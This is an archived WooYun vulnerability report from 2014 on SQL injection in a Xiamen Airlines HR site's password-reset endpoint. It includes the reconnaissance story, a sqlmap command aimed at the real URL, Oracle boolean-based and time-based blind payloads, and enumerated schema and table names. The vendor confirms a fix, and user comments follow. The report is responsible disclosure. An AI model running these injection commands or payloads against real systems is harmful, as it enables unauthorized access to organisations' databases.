当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070871

漏洞标题:厦门航空某处SQL注入可泄露主站以及商城信息

相关厂商:xiamenair.com

漏洞作者: zcy

提交时间:2014-08-03 18:12

修复时间:2014-08-15 16:23

公开时间:2014-08-15 16:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-03: 细节已通知厂商并且等待厂商处理中
2014-08-05: 厂商已经确认,细节仅向厂商公开
2014-08-15: 细节向核心白帽子及相关领域专家公开
2014-08-15: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

我有强迫症。¥##%&……¥%#……*&&(**

详细说明:

从以前开始就想对厦门航空进行安全测试。昨天有时间了,开始测试。从wooyun还有域名信息开始收集。通过http://wooyun.org/bugs/wooyun-2010-045840找到了厦航的第一个ip段,然后进行80与8080端口检测,发现了一个dmz的登陆以及几个深信服的管理页面跟CISCO的防火墙登陆页面,尝试了深信服的命令执行漏洞未果。将目光转到了web端。最终将目标放在了hr.xiamenair.com.cn,注册用户以后开始全局测试,找了一会儿看到了一个找回密码。对于sql注入我本以为是没有的,想找个逻辑漏洞,在点击找回密码以后,通过抓包看到了

http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxxxx&User_Name=xxxxxx

,一个ajax请求,不管了。在挖不到漏洞我就受不了了,果断试了下是否存在sql注入,通过sqlmap的测试,成功发现一个sql注入。我好开森啊。

漏洞证明:

__                 __                          
 /\ \               /\ \  __                     
 \ \ \/'\     ___   \_\ \/\_\    ___      __     
  \ \ , <    / __`\ /'_` \/\ \ /' _ `\  /'_ `\   
   \ \ \\`\ /\ \L\ \\ \L\ \ \ \/\ \/\ \/\ \L\ \  
    \ \_\ \_\ \____/ \___,_\ \_\ \_\ \_\ \____ \ 
     \/_/\/_/\/___/ \/__,_ /\/_/\/_/\/_/\/___L\ \
                                          /\____/
       The Cloud Development Environment  \_/__/ 
 
       Type help for our interactive help system 
 


mask 区域


*****3r*****






@vm-0:~$ sudo sqlmap -u "http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxx%40xxxx.com&User_Name=xxxxx" --tables --time-sec=2
[sudo] password for 





mask 区域


*****3r*****






:            
 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage cau
sed by this program
 
[*] starting at 09:13:31
 
[09:13:31] [INFO] resuming back-end DBMS 'oracle' 
[09:13:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: User_Name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=PasswordReset&User_Login_Name=





mask 区域


*****c@j*****






.com&User_Name=





mask 区域


*****%E5%8*****






' AND 8520=8520 AND 'jhpF'='jhpF
 
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: action=PasswordReset&User_Login_Name=





mask 区域


*****c@j*****






.com&User_Name=





mask 区域


*****%E5%8*****






' AND 7689=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'nREw'='nREw
---
[09:13:33] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[09:13:33] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:13:33] [INFO] fetching database (schema) names
[09:13:33] [INFO] fetching number of databases
[09:13:33] [INFO] resumed: 6
[09:13:33] [INFO] resumed: ETKT
[09:13:33] [INFO] resumed: HR_RECRUIT_ADM
[09:13:33] [INFO] resumed: SYS
[09:13:33] [INFO] resumed: SYSTEM
[09:13:33] [INFO] resumed: XHSHOPADM
[09:13:33] [INFO] resumed: XMAIR
[09:13:33] [INFO] fetching tables for databases: 'ETKT, HR_RECRUIT_ADM, SYS, SYSTEM, XHSHOPADM, XMAIR'
[09:13:33] [INFO] fetching number of tables for database 'HR_RECRUIT_ADM'
[09:13:33] [INFO] resumed: 30
[09:13:33] [INFO] resumed: JOBS_CODEDETAIL
[09:13:33] [INFO] resumed: JOBS_ELEME
[09:13:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:13:33] [INFO] retrieved: JOBS_FILES
[09:14:25] [INFO] retrieved: JOBS_FORUM_REPLY
[09:16:07] [INFO] retrieved: JOBS_FORUM_SECTION
[09:17:34] [INFO] retrieved: JOBS_FORUM_TOPIC
[09:18:38] [INFO] retrieved: JOBS_HTML
[09:19:26] [INFO] retrieved: JOBS_MESSAGE_INFO
[09:21:52] [INFO] retrieved: JOBS_MESSAGE_M
[09:22:26] [INFO] retrieved: 
[09:22:36] [INFO] retrieved:


QQ截图20140803180733.png


一个Oracle的眼是盲注。通过前面的库,可以看到涉及到的不只是hr的数据库,还有shop跟xmair,我猜可能有主站信息,一个注入跑了一下午,我的邮箱快崩溃了。。。为了防止我的信息泄露,上面的信息我打码了。本人语文不好,所以写这个大多数也不是很通顺,能看懂就好了。

修复方案:

过滤User_Name参数

版权声明:转载请注明来源 zcy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-08-05 08:25

厂商回复:

昨日已经确认,并且已经整改完成,目前公司内部在复查,感谢对厦门航空信息安全的支持。

最新状态:

2014-08-15:已经整改完成,感谢您对厦航信息安全的支持

2014-08-15:已经整改完成,感谢您对厦航信息安全的支持,

漏洞评价:

评论

  1. 2014-08-03 18:58 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    不要去查我啊

  2. 2014-08-03 19:01 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

    -。-@肉肉能看到详情

  3. 2014-08-03 20:29 | Moo ( 路人 | Rank:8 漏洞数:3 | PS:不打脸,还要泡妞呢)

    @肉肉 审核下管理员http://www.wooyun.org/bugs/wooyun-2014-070806/trace/124b6930784cafb73868c0a8c715dbd1

  4. 2014-08-04 11:03 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @Moo 你的已经审核了。@zcy 看不到啊,看到漏洞标题描述就觉得高大上啊

  5. 2014-08-04 11:54 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

    @那你说查你干嘛啊。。

  6. 2014-08-04 17:22 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

    @厦门航空 求确认啊。。。

  7. 2014-08-15 18:57 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    咦,我擦,那不是我么-_-#

  8. 2014-08-15 19:01 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

    @袋鼠妈妈 哪个

  9. 2014-08-15 19:02 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

    @袋鼠妈妈 感谢袋鼠大牛提交的漏洞 :)

  10. 2014-08-15 19:09 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    @zcy 我不是大牛-_-#,我是逗比……

  11. 2014-08-15 19:11 | zcy ( 实习白帽子 | Rank:93 漏洞数:15 )

    @袋鼠妈妈 -_-#感谢袋鼠逗比

  12. 2014-08-21 17:21 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    哈哈